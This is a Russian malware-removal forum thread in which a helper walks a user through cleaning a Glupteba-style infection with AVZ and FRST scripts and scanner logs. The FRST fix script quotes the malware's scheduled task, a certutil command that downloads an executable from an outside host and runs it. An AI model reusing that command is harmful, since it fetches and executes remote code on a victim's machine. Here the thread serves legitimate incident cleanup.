Страница 1 из 2 12 Последняя
Показано с 1 по 20 из 30.

Антивирусный дистрибутив не устанавливается [UDS:DangerousObject.Multi.Generic, HEUR:Trojan-Proxy.Win32.Glupteba.ge= n] (заявка № 224201)

  1. #1
    Student (P) Репутация
    Регистрация
    06.10.2013
    Сообщений
    16
    Вес репутации
    44

    Антивирусный дистрибутив не устанавливается [UDS:DangerousObject.Multi.Generic, HEUR:Trojan-Proxy.Win32.Glupteba.ge= n]

    Здравствуйте
    компьютер заражен вирусами, сканирование разными антивирусными сканерами не помогает
    прошу вас помочь

  2. Будь в курсе!
    Реклама на VirusInfo

    Надоело быть жертвой? Стань профи по информационной безопасности, получай самую свежую информацию об угрозах и средствах защиты от ведущего российского аналитического центра Anti-Malware.ru:

    Anti-Malware Telegram
     

  3. #2
    Cyber Репутация Репутация Репутация Репутация Репутация Репутация Репутация Репутация Репутация Репутация Репутация Аватар для Info_bot
    Регистрация
    11.05.2011
    Сообщений
    2,289
    Вес репутации
    384
    Уважаемый(ая) i--l--g--i--z, спасибо за обращение на наш форум!

    Помощь при заражении комьютера на VirusInfo.Info оказывается абсолютно бесплатно. Хелперы, в самое ближайшее время, ответят на Ваш запрос. Для оказания помощи необходимо предоставить логи сканирования утилитой Autologger, подробнее можно прочитать в правилах оформления запроса о помощи.

    information

    Информация

    Если вы хотите получить персональную гарантированную помощь в приоритетном режиме, то воспользуйтесь платным сервисом Помогите+.





    Если наш сайт окажется полезен Вам и у Вас будет такая возможность - пожалуйста поддержите проект.

  4. #3
    Helper Репутация Репутация Репутация Репутация Репутация Репутация Репутация Репутация Репутация Репутация Репутация
    Регистрация
    11.11.2007
    Сообщений
    4,374
    Вес репутации
    164
    Здравствуйте!

    Вы собрали логи устаревшей версией (с зеркала). Удалите Autologger и созданную им папку вместе с содержимым. Скачайте актуальную версию (по ссылке из правил) и повторите CollectionLog.

  5. #4
    Student (P) Репутация
    Регистрация
    06.10.2013
    Сообщений
    16
    Вес репутации
    44

    Антивирусный дистрибутив не устанавливается

    Цитата Сообщение от Sandor Посмотреть сообщение
    Здравствуйте!

    Вы собрали логи устаревшей версией (с зеркала). Удалите Autologger и созданную им папку вместе с содержимым. Скачайте актуальную версию (по ссылке из правил) и повторите CollectionLog.
    Вложение 680242

    отчет во вложении

  6. #5
    Helper Репутация Репутация Репутация Репутация Репутация Репутация Репутация Репутация Репутация Репутация Репутация
    Регистрация
    11.11.2007
    Сообщений
    4,374
    Вес репутации
    164
    Через Панель управления - Удаление программ - удалите нежелательное ПО:
    CloudNet

    Временно отключите защитное ПО.
    Выполните скрипт в AVZ:

    Код:
    {Исправление в службах в реестре, значения ImagePath.
    Данный скрипт распространяется свободно и может быть модифицирован по согласованию с авторами - представителями Virusnet.info
    При публикации скрипта данный комментарий и ссылка на VirusNet.Info обязательна. }
    var DescriptionTextWuauServ, DispayNameTextWuauServ, DescriptionTextBITS: String;
     DispayNameTextBITS, FullPathSystem32, NameFolderSystem32, FileServiceDll: String;  
     ImagePathStr, RootStr, SubRootStr, LangID: string;
     AllRoots, AllKeys, RootsRestored, KeysRestored, KeysFixed: integer;
     FinishMsg, RestoreMsg, FixMsg, CheckMsg: String; 
     RegSectMsg, ParamMsg, ParamValueMsg, InRegSectMsg, CorrectMsg, RestMsg: String;
    
    procedure CheckAndRestoreSection(Root: String);
    begin
     Inc(AllRoots);
     if RegKeyExistsEx('HKLM', Root) then
       RegKeyResetSecurity('HKLM', Root)
     else
      begin
        Inc(RootsRestored);
        RegKeyCreate('HKLM', Root);
        AddToLog(RegSectMsg + Root + RestMsg);
       end;
    end;
    
    procedure CheckAndRestoreSubSection;
    begin
      CheckAndRestoreSection(SubRootStr);
    end;
    
    procedure RestoredMsg(Root, Param: String);
    begin
      AddToLog(ParamMsg + Param + InRegSectMsg + Root + RestMsg);
      Inc(KeysRestored);
    end;
    
    procedure FixedMsg(Root, Param: String);
    begin
      AddToLog(ParamValueMsg + Param + InRegSectMsg + Root + CorrectMsg);
      Inc(KeysFixed);
    end;
    
    procedure RestoreStrParam(Root, Param, Value: String);
    begin
      RegKeyStrParamWrite('HKLM', Root, Param, Value);
      RestoredMsg(Root, Param);
    end;
    
    procedure CheckAndRestoreStrParam(Root, Param, Value: String);
    begin
      Inc(AllKeys);
      if not RegKeyParamExists('HKLM', Root, Param) then
        RestoreStrParam(Root, Param, Value);
    end;
    
    procedure CheckAndRestoreIntParam(Root, Param: String; Value: Integer);
    begin
     Inc(AllKeys);
     if not RegKeyParamExists('HKLM', Root, Param) then 
      begin
        RegKeyIntParamWrite('HKLM', Root, Param, Value);
        RestoredMsg(Root, Param);
      end;
    end;
    
    procedure CheckAndRestoreMultiSZParam(Param, Value: String);
    begin
     Inc(AllKeys);
     if not RegKeyParamExists('HKLM', RootStr, Param) then
      begin
        ExecuteFile('REG ADD HKLM\' + RootStr + ' /v ' + Param + Value, '', 0, 10000, true);
        RestoredMsg(RootStr, Param);
      end;
    end;
    
    // Исправление значения параметра ImagePath для служб 'wuauserv' и 'BITS'
    procedure ImagePathFix(Node, Srv: String);
    var RegStr: String;
    begin
     RegStr := 'SYSTEM\' + Node + '\Services\' + Srv;
     if RegKeyExistsEx('HKLM', RegStr) then
      begin
        Inc(AllKeys);
        RegKeyResetSecurity('HKLM', RegStr);
        RegKeyStrParamWrite('HKLM', RegStr, 'ImagePath', ImagePathStr);
        FixedMsg(RegStr, 'ImagePath');
      end;
    end;
    
    { Выполнение исправление всех ключей в ветках -
       'HKLM\SYSTEM\CurrentControlSet\Services\BITS' и 'HKLM\SYSTEM\CurrentControlSet\Services\wuauserv'}
    procedure CorrectRegistryRoot(DescriptionText, DisplayNameText, Srv: String);
    var FileServiceDll, CCSNumber: string;
         i : integer;
    begin
     if Srv = 'BITS' then
       FileServiceDll := FullPathSystem32 + 'qmgr.dll'
     else
       FileServiceDll := FullPathSystem32 + 'wuauserv.dll';
     RootStr:= 'SYSTEM\CurrentControlSet\Services\' + Srv;
    
     CheckAndRestoreSection(RootStr);
    
     CheckAndRestoreStrParam(RootStr, 'Description', DescriptionText);
     CheckAndRestoreStrParam(RootStr, 'DisplayName', DisplayNameText);
     CheckAndRestoreStrParam(RootStr, 'ObjectName', 'LocalSystem');
    
     Inc(AllKeys);
     if not RegKeyParamExists('HKLM', RootStr, 'ImagePath') then
       RestoreStrParam(RootStr, 'ImagePath', ImagePathStr)
     else
      begin
        Dec(AllKeys);
        if LowerCase(RegKeyStrParamRead('HKLM', RootStr, 'ImagePath')) <> LowerCase(ImagePathStr) then
          for i:= 0 to 999 do
           begin
             if i > 0 then
               CCSNumber := FormatFloat('ControlSet000', i)
             else
               CCSNumber := 'CurrentControlSet';
             ImagePathFix(CCSNumber, Srv);
          end;
       end;
    
     CheckAndRestoreIntParam(RootStr, 'ErrorControl', 1);
     CheckAndRestoreIntParam(RootStr, 'Start', 2);
     CheckAndRestoreIntParam(RootStr, 'Type', 32);
    
     if Srv = 'BITS' then
      begin
        CheckAndRestoreMultiSZParam('DependOnService', ' /t REG_MULTI_SZ /d RpcSs');
        CheckAndRestoreMultiSZParam('DependOnGroup', ' /t REG_MULTI_SZ');
      end;
    
     SubRootStr:= RootStr + '\Enum';
     CheckAndRestoreSubSection;
    
     CheckAndRestoreStrParam(SubRootStr, '0', 'Root\LEGACY_' + UpperCase(Srv) + '\0000');
     CheckAndRestoreIntParam(SubRootStr, 'Count', 1);
     CheckAndRestoreIntParam(SubRootStr, 'NextInstance', 1);
    
     SubRootStr := RootStr + '\Security';
     CheckAndRestoreSubSection;
    
     Inc(AllKeys);
     if not RegKeyParamExists('HKLM', SubRootStr, 'Security') then
      begin
        RegKeyBinParamWrite('HKLM', SubRootStr, 'Security', '01,00,14,80,78,00,00,00,84,00,00,00,14,00,00,00,30,00,00,00,02,00,1c,00,01,00,00,00,02,80,14,00,ff,00,0f,00,01,01,00,00,00,00,00,01,00,00,00,00,02,00,48,00,03,00,00,00,00,00,14,00,9d,00,02,00,01,01,00,00,00,00,00,05,0b,00,00,00,00,00,18,00,ff,01,0f,00,01,02,00,00,00,00,00,05,20,00,00,00,20,02,00,00,00,00,14,00,ff,01,0f,00,01,01,00,00,00,00,00,05,12,00,00,00,01,01,00,00,00,00,00,05,12,00,00,00,01,01,00,00,00,00,00,05,12,00,00,00');
        RestoredMsg(SubRootStr, 'Security');
      end;
    
     SubRootStr:= RootStr + '\Parameters';
     CheckAndRestoreSubSection;
    
     Inc(AllKeys);
     if not RegKeyParamExists('HKLM', SubRootStr, 'ServiceDll') then
      begin
        RegKeyParamWrite('HKLM', SubRootStr, 'ServiceDll', 'REG_EXPAND_SZ', FileServiceDll);
        RestoredMsg(SubRootStr, 'ServiceDll');
      end
     else if LowerCase(RegKeyStrParamRead('HKLM', SubRootStr, 'ServiceDll')) <> LowerCase(FileServiceDll) then
      begin
        RegKeyParamWrite('HKLM', SubRootStr, 'ServiceDll', 'REG_EXPAND_SZ', FileServiceDll);
        FixedMsg(SubRootStr, 'ServiceDll');
      end
    end;
    
    { Главное выполнение }
    begin
    ExecuteFile('net.exe', 'stop tcpip /y', 0, 15000, true);
    SearchRootkit(true, true);
    SetAVZGuardStatus(True);
     TerminateProcessByName('c:\windows\rss\csrss.exe');
     TerminateProcessByName('c:\windows\windefender.exe');
     StopService('4F959A7FC8138071');
     StopService('WinDefender');
     StopService('Winmon');
     StopService('WinmonFS');
     StopService('WinmonProcessMonitor');
     QuarantineFile('C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Startup\DOC001.exe', '');
     QuarantineFile('C:\Users\Baza\appdata\local\temp\csrss\cloudnet.exe', '');
     QuarantineFile('C:\Users\Baza\AppData\Local\Temp\csrss\scheduled.exe', '');
     QuarantineFile('C:\Users\Baza\appdata\roaming\epicnet inc\cloudnet\cloudnet.exe', '');
     QuarantineFile('C:\Users\Baza\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\LtHgNeMqRB.url', '');
     QuarantineFile('c:\windows\rss\csrss.exe', '');
     QuarantineFile('C:\Windows\System32\drivers\Winmon.sys', '');
     QuarantineFile('C:\Windows\System32\drivers\WinmonFS.sys', '');
     QuarantineFile('C:\Windows\System32\drivers\WinmonProcessMonitor.sys', '');
     QuarantineFile('C:\Windows\TEMP\4DDAE01.sys', '');
     QuarantineFile('c:\windows\windefender.exe', '');
     DeleteFile('C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Startup\DOC001.exe', '32');
     DeleteFile('C:\Users\Baza\appdata\local\temp\csrss\cloudnet.exe', '');
     DeleteFile('C:\Users\Baza\appdata\local\temp\csrss\scheduled.exe', '');
     DeleteFile('C:\Users\Baza\AppData\Local\Temp\csrss\scheduled.exe', '32');
     DeleteFile('C:\Users\Baza\appdata\roaming\epicnet inc\cloudnet\cloudnet.exe', '');
     DeleteFile('C:\Users\Baza\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\DOC001.exe', '32');
     DeleteFile('C:\Users\Baza\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\LtHgNeMqRB.url', '32');
     DeleteFile('c:\windows\rss\csrss.exe', '');
     DeleteFile('C:\Windows\rss\csrss.exe', '32');
     DeleteFile('C:\Windows\System32\drivers\Winmon.sys', '32');
     DeleteFile('C:\Windows\System32\drivers\WinmonFS.sys', '32');
     DeleteFile('C:\Windows\System32\drivers\WinmonProcessMonitor.sys', '32');
     DeleteFile('C:\Windows\TEMP\4DDAE01.sys', '32');
     DeleteFile('c:\windows\windefender.exe', '32');
     DeleteService('WinDefender');
     DeleteService('Winmon');
     DeleteService('WinmonFS');
     DeleteService('WinmonProcessMonitor');
     ClearLog;
     ExpRegKey('HKLM', 'SYSTEM\CurrentControlSet\Services\wuauserv', 'wuauserv.reg');
     ExpRegKey('HKLM', 'SYSTEM\CurrentControlSet\Services\BITS', 'BITS.reg');
     LangID:= RegKeyStrParamRead('HKLM', 'SYSTEM\CurrentControlSet\Control\Nls\Language', 'InstallLanguage'); 
     if LangID = '0419' then
      begin
        DescriptionTextWuauServ := 'Включает загрузку и установку обновлений Windows. Если служба отключена, то на этом компьютере нельзя будет использовать возможности автоматического обновления или веб-узел Центра обновления Windows.';
        DispayNameTextWuauServ := 'Автоматическое обновление';
        DescriptionTextBITS := 'Обеспечивает передачу данных между клиентами и серверами в фоновом режиме. Если служба BITS отключена, такие возможности, как Windows Update, не могут правильно работать.';
        DispayNameTextBITS := 'Фоновая интеллектуальная служба передачи (BITS)';
        AddToLog('Операционная система - русская');
        FinishMsg := '–––– Восстановление завершено ––––';
        RestoreMsg := 'Восстановлено разделов\параметров: ';
        FixMsg := 'Исправлено параметров: ';
        CheckMsg := 'Проверено разделов\параметров: ';
        RegSectMsg := 'Раздел реестра HKLM\';
        ParamMsg := 'Параметр ';
        ParamValueMsg := 'Значение параметра ';
        InRegSectMsg := ' в разделе реестра HKLM\';
        CorrectMsg := ' исправлено на оригинальное.';
        RestMsg := ' восстановлен.';
      end
     else if LangID = '0409' then
      begin
        DescriptionTextWuauServ := 'Enables the download and installation of Windows updates. If this service is disabled, this computer will not be able to use the Automatic Updates feature or the Windows Update Web site.';
        DispayNameTextWuauServ := 'Automatic Updates'; 
        DescriptionTextBITS := 'Transfers data between clients and servers in the background. If BITS is disabled, features such as Windows Update will not work correctly.';
        DispayNameTextBITS := 'Background Intelligent Transfer Service';
        AddToLog('Operation system - english');
        FinishMsg := '–––– Restoration finished ––––';
        RestoreMsg := 'Sections\parameters restored: ';
        FixMsg := 'Parameters corrected: ';
        CheckMsg := 'Sections\parameters checked: ';
        RegSectMsg := 'Registry section HKLM\';
        ParamMsg := 'Parameter ';
        ParamValueMsg := 'Value of parameter ';
        InRegSectMsg := ' in registry section HKLM\';
        CorrectMsg := ' corrected on original.';
        RestMsg := ' restored.';
      end;
     AddToLog('');
    
    { Определение папки X:\Windows\System32\ }
     NameFolderSystem32 := RegKeyStrParamRead('HKLM', 'SYSTEM\CurrentControlSet\Control\Windows', 'SystemDirectory');
     ImagePathStr := NameFolderSystem32 + '\svchost.exe -k netsvcs';
     Delete(NameFolderSystem32, 1, pos('\', NameFolderSystem32) - 1);
     FullPathSystem32 := GetEnvironmentVariable('WinDir') + NameFolderSystem32 + '\';
     
     AllRoots := 0;
     AllKeys := 0;
     RootsRestored := 0;
     KeysRestored := 0;
     KeysFixed := 0;
    
     CorrectRegistryRoot(DescriptionTextBITS, DispayNameTextBITS, 'BITS');
     CorrectRegistryRoot(DescriptionTextWuauServ, DispayNameTextWuauServ, 'wuauserv');
    
     AddToLog('');
     AddToLog(FinishMsg);
     AddToLog('');
     AddToLog(RestoreMsg + IntToStr(RootsRestored) + ' \ ' + IntToStr(KeysRestored));
     AddToLog(FixMsg + IntToStr(KeysFixed));
     AddToLog(CheckMsg + IntToStr(AllRoots) + ' \ ' + IntToStr(AllKeys));
     SaveLog(RegKeyStrParamRead('HKEY_CURRENT_USER', 'Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders', 'Desktop') + '\Correct_wuauserv&BITS.log');
     DeleteSchedulerTask('csrss');
     DeleteSchedulerTask('ScheduledUpdate');
     RegKeyDel('HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Shared Tools\MSConfig\startupfolder\C:^ProgramData^Microsoft^Windows^Start Menu^Programs^Startup^DOC001.exe', '32');
     RegKeyDel('HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Shared Tools\MSConfig\startupfolder\C:^Users^Baza^AppData^Roaming^Microsoft^Windows^Start Menu^Programs^Startup^DOC001.exe', '32');
     RegKeyDel('HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Shared Tools\MSConfig\startupfolder\C:^Users^Baza^AppData^Roaming^Microsoft^Windows^Start Menu^Programs^Startup^LtHgNeMqRB.url', '32');
     RegKeyParamDel('HKEY_CURRENT_USER','Software\Microsoft\Windows\CurrentVersion\Run','QuietDew', '32');
     DeleteService('4F959A7FC8138071');
    BC_ImportALL;
    ExecuteSysClean;
    BC_Activate;
     ExecuteWizard('SCU', 2, 3, true);
    RebootWindows(true);
    end.
    Компьютер перезагрузится.

    После перезагрузки, выполните такой скрипт:

    Код:
    begin
    CreateQurantineArchive(GetAVZDirectory+'quarantine.zip'); 
    end.
    Файл quarantine.zip из папки AVZ загрузите по ссылке "Прислать запрошенный карантин" вверху темы.

    После выполнения скрипта на рабочем столе появится текстовый файл Correct_wuauserv&BITS.log. Его необходимо прикрепить к следующему сообщению.


    Сделайте повторные логи по правилам. (CollectionLog)

  7. #6
    Student (P) Репутация
    Регистрация
    06.10.2013
    Сообщений
    16
    Вес репутации
    44

    Антивирусный дистрибутив не устанавливается

    выполнил все инструкции
    файлы во вложении
    Вложения Вложения

  8. #7
    Helper Репутация Репутация Репутация Репутация Репутация Репутация Репутация Репутация Репутация Репутация Репутация
    Регистрация
    11.11.2007
    Сообщений
    4,374
    Вес репутации
    164
    Пролечите систему с помощью KVRT, папку C:\KVRT\reports упакуйте в архив и прикрепите к следующему сообщению.

    После этого соберите свежий CollectionLog.

  9. #8
    Student (P) Репутация
    Регистрация
    06.10.2013
    Сообщений
    16
    Вес репутации
    44

    Антивирусный дистрибутив не устанавливается

    Файлы выше
    Вложения Вложения

  10. #9
    Helper Репутация Репутация Репутация Репутация Репутация Репутация Репутация Репутация Репутация Репутация Репутация
    Регистрация
    11.11.2007
    Сообщений
    4,374
    Вес репутации
    164
    Уже лучше, но еще не все.
    • Скачайте AdwCleaner (by Malwarebytes) и сохраните его на Рабочем столе.
    • Запустите его (необходимо запускать через правую кн. мыши от имени администратора), нажмите кнопку "Scan" ("Сканировать") и дождитесь окончания сканирования.
    • Когда сканирование будет завершено, отчет будет сохранен в следующем расположении: C:\AdwCleaner\Logs\AdwCleaner[Sxx].txt (где x - любая цифра).
    • Прикрепите отчет к своему следующему сообщению.

  11. #10
    Student (P) Репутация
    Регистрация
    06.10.2013
    Сообщений
    16
    Вес репутации
    44

    Антивирусный дистрибутив не устанавливается

    Цитата Сообщение от Sandor Посмотреть сообщение
    Уже лучше, но еще не все.
    • Скачайте AdwCleaner (by Malwarebytes) и сохраните его на Рабочем столе.
    • Запустите его (необходимо запускать через правую кн. мыши от имени администратора), нажмите кнопку "Scan" ("Сканировать") и дождитесь окончания сканирования.
    • Когда сканирование будет завершено, отчет будет сохранен в следующем расположении: C:\AdwCleaner\Logs\AdwCleaner[Sxx].txt (где x - любая цифра).
    • Прикрепите отчет к своему следующему сообщению.
    выполнил сканирование AdwCleaner

    - - - - -Добавлено - - - - -

    Цитата Сообщение от i--l--g--i--z Посмотреть сообщение
    выполнил сканирование AdwCleaner
    Здравствуйте, все эти действия не помогли
    дистрибутив антивирусной защиты не устанавливается.
    обновление windows не включается
    Вложения Вложения

  12. #11
    Helper Репутация Репутация Репутация Репутация Репутация Репутация Репутация Репутация Репутация Репутация Репутация
    Регистрация
    11.11.2007
    Сообщений
    4,374
    Вес репутации
    164
    Мы ещё не закончили.

    Скачайте Farbar Recovery Scan Tool (или с зеркала) и сохраните на Рабочем столе.

    Примечание: необходимо выбрать версию, совместимую с вашей операционной системой. Если вы не уверены, какая версия подойдет для вашей системы, скачайте обе и попробуйте запустить. Только одна из них запустится на вашей системе.
    Когда программа запустится, нажмите Yes для соглашения с предупреждением.

    Нажмите кнопку Scan.
    После окончания сканирования будут созданы отчеты FRST.txt и Addition.txt в той же папке, откуда была запущена программа. Прикрепите отчеты к своему следующему сообщению.

  13. #12
    Student (P) Репутация
    Регистрация
    06.10.2013
    Сообщений
    16
    Вес репутации
    44

    Антивирусный дистрибутив не устанавливается

    Цитата Сообщение от Sandor Посмотреть сообщение
    Мы ещё не закончили.

    Скачайте Farbar Recovery Scan Tool (или с зеркала) и сохраните на Рабочем столе.

    Примечание: необходимо выбрать версию, совместимую с вашей операционной системой. Если вы не уверены, какая версия подойдет для вашей системы, скачайте обе и попробуйте запустить. Только одна из них запустится на вашей системе.
    Когда программа запустится, нажмите Yes для соглашения с предупреждением.

    Нажмите кнопку Scan.
    После окончания сканирования будут созданы отчеты FRST.txt и Addition.txt в той же папке, откуда была запущена программа. Прикрепите отчеты к своему следующему сообщению.

    Прикрепил отчеты к сообщению
    Вложения Вложения

  14. #13
    Helper Репутация Репутация Репутация Репутация Репутация Репутация Репутация Репутация Репутация Репутация Репутация
    Регистрация
    11.11.2007
    Сообщений
    4,374
    Вес репутации
    164
    • Отключите до перезагрузки антивирус.
    • Выделите следующий код:
      Код:
      Start::
      CreateRestorePoint:
      CloseProcesses:
      HKU\S-1-5-21-3936912291-2935142151-2983686668-1000\...\MountPoints2: {1f717c32-b8d8-11e5-9749-002522d5b574} - G:\LGAutoRun.exe
      GroupPolicy: Restriction ? <==== ATTENTION
      GroupPolicy\User: Restriction ? <==== ATTENTION
      Task: {1D75C3E5-CC23-46BB-8238-2D6C642696B0} - System32\Tasks\ScheduledUpdate => cmd.exe /C certutil.exe -urlcache -split -f hxxp://imaginemix.ru/app/app.exe C:\Users\Baza\AppData\Local\Temp\csrss\scheduled.exe && C:\Users\Baza\AppData\Local\Temp\csrss\scheduled.exe /31340 <==== ATTENTION
      Task: {B0AD56F5-1883-42A2-97D4-62BCB5D05EC6} - System32\Tasks\csrss => C:\Windows\rss\csrss.exe [4016640 2019-12-20] () [File not signed] <==== ATTENTION
      Toolbar: HKU\S-1-5-21-3936912291-2935142151-2983686668-1000 -> No Name - {093F479D-712E-46CD-9E06-62E734A05F68} -  No File
      R2 WinDefender; C:\Windows\windefender.exe [0 0000-00-00] () <==== ATTENTION (zero byte File/Folder)
      2019-12-20 09:21 - 2019-12-20 09:21 - 000000000 ____D C:\Users\Baza\AppData\Roaming\EpicNet Inc
      2019-12-20 09:20 - 2019-12-20 12:01 - 000003482 _____ C:\Windows\system32\Tasks\ScheduledUpdate
      2019-12-20 09:20 - 2019-12-20 12:01 - 000003172 _____ C:\Windows\system32\Tasks\csrss
      FirewallRules: [{217BD779-6FAC-4712-A07B-026FE1DFDDB8}] => (Allow) C:\Users\Baza\AppData\Local\Temp\7ZipSfx.000\bin\tools\aria2c.exe No File
      FirewallRules: [{BE8CB9D6-9B44-4FC6-9A06-EB69D80F0A7A}] => (Allow) C:\Program Files\DriverPack Cloud\cloud.exe No File
      FirewallRules: [{0713AA24-E86E-4D88-BAA8-C5E311B5AFE5}] => (Allow) C:\Windows\rss\csrss.exe () [File not signed]
      FirewallRules: [{7DA884E6-275B-4A63-88F8-6A91C4B37605}] => (Allow) C:\Users\Baza\AppData\Roaming\EpicNet Inc\CloudNet\cloudnet.exe No File
      EmptyTemp:
      Reboot:
      End::
    • Скопируйте выделенный текст (правой кнопкой - Копировать).
    • Запустите FRST (FRST64) от имени администратора.
    • Нажмите Fix один раз (!) и подождите. Программа создаст лог-файл (Fixlog.txt). Прикрепите его к своему следующему сообщению.

    Компьютер будет перезагружен автоматически.

  15. #14
    Student (P) Репутация
    Регистрация
    06.10.2013
    Сообщений
    16
    Вес репутации
    44

    Антивирусный дистрибутив не устанавливается

    Цитата Сообщение от Sandor Посмотреть сообщение
    • Отключите до перезагрузки антивирус.
    • Выделите следующий код:
      Код:
      Start::
      CreateRestorePoint:
      CloseProcesses:
      HKU\S-1-5-21-3936912291-2935142151-2983686668-1000\...\MountPoints2: {1f717c32-b8d8-11e5-9749-002522d5b574} - G:\LGAutoRun.exe
      GroupPolicy: Restriction ? <==== ATTENTION
      GroupPolicy\User: Restriction ? <==== ATTENTION
      Task: {1D75C3E5-CC23-46BB-8238-2D6C642696B0} - System32\Tasks\ScheduledUpdate => cmd.exe /C certutil.exe -urlcache -split -f hxxp://imaginemix.ru/app/app.exe C:\Users\Baza\AppData\Local\Temp\csrss\scheduled.exe && C:\Users\Baza\AppData\Local\Temp\csrss\scheduled.exe /31340 <==== ATTENTION
      Task: {B0AD56F5-1883-42A2-97D4-62BCB5D05EC6} - System32\Tasks\csrss => C:\Windows\rss\csrss.exe [4016640 2019-12-20] () [File not signed] <==== ATTENTION
      Toolbar: HKU\S-1-5-21-3936912291-2935142151-2983686668-1000 -> No Name - {093F479D-712E-46CD-9E06-62E734A05F68} -  No File
      R2 WinDefender; C:\Windows\windefender.exe [0 0000-00-00] () <==== ATTENTION (zero byte File/Folder)
      2019-12-20 09:21 - 2019-12-20 09:21 - 000000000 ____D C:\Users\Baza\AppData\Roaming\EpicNet Inc
      2019-12-20 09:20 - 2019-12-20 12:01 - 000003482 _____ C:\Windows\system32\Tasks\ScheduledUpdate
      2019-12-20 09:20 - 2019-12-20 12:01 - 000003172 _____ C:\Windows\system32\Tasks\csrss
      FirewallRules: [{217BD779-6FAC-4712-A07B-026FE1DFDDB8}] => (Allow) C:\Users\Baza\AppData\Local\Temp\7ZipSfx.000\bin\tools\aria2c.exe No File
      FirewallRules: [{BE8CB9D6-9B44-4FC6-9A06-EB69D80F0A7A}] => (Allow) C:\Program Files\DriverPack Cloud\cloud.exe No File
      FirewallRules: [{0713AA24-E86E-4D88-BAA8-C5E311B5AFE5}] => (Allow) C:\Windows\rss\csrss.exe () [File not signed]
      FirewallRules: [{7DA884E6-275B-4A63-88F8-6A91C4B37605}] => (Allow) C:\Users\Baza\AppData\Roaming\EpicNet Inc\CloudNet\cloudnet.exe No File
      EmptyTemp:
      Reboot:
      End::
    • Скопируйте выделенный текст (правой кнопкой - Копировать).
    • Запустите FRST (FRST64) от имени администратора.
    • Нажмите Fix один раз (!) и подождите. Программа создаст лог-файл (Fixlog.txt). Прикрепите его к своему следующему сообщению.

    Компьютер будет перезагружен автоматически.
    лог прикрепил
    Вложения Вложения

  16. #15
    Helper Репутация Репутация Репутация Репутация Репутация Репутация Репутация Репутация Репутация Репутация Репутация
    Регистрация
    11.11.2007
    Сообщений
    4,374
    Вес репутации
    164
    Цитата Сообщение от i--l--g--i--z Посмотреть сообщение
    Антивирусный дистрибутив не устанавливается
    Что вы под этим подразумеваете?
    Какой-то антивирус пытаетесь установить и не получается?

  17. #16
    Student (P) Репутация
    Регистрация
    06.10.2013
    Сообщений
    16
    Вес репутации
    44

    Антивирусный дистрибутив не устанавливается

    Цитата Сообщение от Sandor Посмотреть сообщение
    Что вы под этим подразумеваете?
    Какой-то антивирус пытаетесь установить и не получается?
    да не получается установить антивирус eset avremover_ees_nt32_rus, доходит но копирования файлов и прерывается

    хочу установить обновления windows не устанавливается

    - - - - -Добавлено - - - - -

    да не устанавливается eset avremover_ees_nt32_rus
    не устанавливается обновление windows
    в списке службы нет службы обновление
    это наблюдается на всех зараженных компьютерах

  18. #17
    Helper Репутация Репутация Репутация Репутация Репутация Репутация Репутация Репутация Репутация Репутация Репутация
    Регистрация
    11.11.2007
    Сообщений
    4,374
    Вес репутации
    164
    Цитата Сообщение от i--l--g--i--z Посмотреть сообщение
    да не устанавливается eset avremover_ees_nt32_rus
    Что именно вы пытаетесь установить? Антивирус Eset? Или запустить утилиту очистки антивирусов?

    В этой системе установлен антивирус Dr.Web Security Space и другие антивирусы устанавливать не нужно. Достаточно одного.

    По службе обновлений - это в другой раздел, т.к. здесь производится именно лечение от вредоносных программ.

  19. #18
    Student (P) Репутация
    Регистрация
    06.10.2013
    Сообщений
    16
    Вес репутации
    44
    у меня корпоративная лицензия на Антивирус Eset, пытаюсь установить eset, Dr.Web Security Space в дальнейшем будет удален

    - - - - -Добавлено - - - - -

    кстати CloudNet снова себя установил, самостоятельно

  20. #19
    Helper Репутация Репутация Репутация Репутация Репутация Репутация Репутация Репутация Репутация Репутация Репутация
    Регистрация
    11.11.2007
    Сообщений
    4,374
    Вес репутации
    164
    Соберите свежий CollectionLog Автологером.
    +
    • Загрузите SecurityCheck by glax24 & Severnyj, сохраните утилиту на Рабочем столе и извлеките из архива.
    • Запустите двойным щелчком мыши (если Вы используете Windows XP) или из меню по щелчку правой кнопки мыши Запустить от имени администратора (если Вы используете Windows Vista/7/8/8.1/10)
    • Если увидите предупреждение от вашего фаервола или SmartScreen относительно программы SecurityCheck, не блокируйте ее работу
    • Дождитесь окончания сканирования, откроется лог в блокноте с именем SecurityCheck.txt
    • Если Вы закрыли Блокнот, то найти этот файл можно в корне системного диска в папке с именем SecurityCheck, например C:\SecurityCheck\SecurityCheck.txt
    • Прикрепите этот файл к своему следующему сообщению.

  21. #20
    Student (P) Репутация
    Регистрация
    06.10.2013
    Сообщений
    16
    Вес репутации
    44

    Антивирусный дистрибутив не устанавливается

    файлы во вложении
    Вложения Вложения

  • Уважаемый(ая) i--l--g--i--z, наши специалисты оказали Вам всю возможную помощь по вашему обращению.

    В целях поддержания безопасности вашего компьютера настоятельно рекомендуем:

     

     

    Чтобы всегда быть в курсе актуальных угроз в области информационной безопасности и сохранять свой компьютер защищенным, рекомендуем следить за последними новостями ИТ-сферы портала Anti-Malware.ru:

     

     

    Anti-Malware VK

     

    Anti-Malware Telegram

     

     

    Надеемся больше никогда не увидеть ваш компьютер зараженным!

     

    Если Вас не затруднит, пополните пожалуйста нашу базу безопасных файлов.

  • Страница 1 из 2 12 Последняя

    Похожие темы

    1. Посоветуйте дистрибутив никсов.
      От Shadow[13] в разделе Linux
      Ответов: 28
      Последнее сообщение: 19.12.2007, 12:11
    2. Вышел дистрибутив Mandriva 2007.1 '2007 Spring'
      От Синауридзе Александр в разделе Linux
      Ответов: 2
      Последнее сообщение: 30.06.2007, 21:13
    3. Ответов: 60
      Последнее сообщение: 26.02.2007, 15:34
    4. BackTrack - новый Linux дистрибутив для анализа безопасности систем
      От Shu_b в разделе Другие программы по безопасности
      Ответов: 0
      Последнее сообщение: 07.02.2006, 09:52
    5. Пиратский дистрибутив Win XP
      От Эгиль в разделе Microsoft Windows
      Ответов: 5
      Последнее сообщение: 21.06.2005, 01:39

    Свернуть/Развернуть Ваши права в разделе

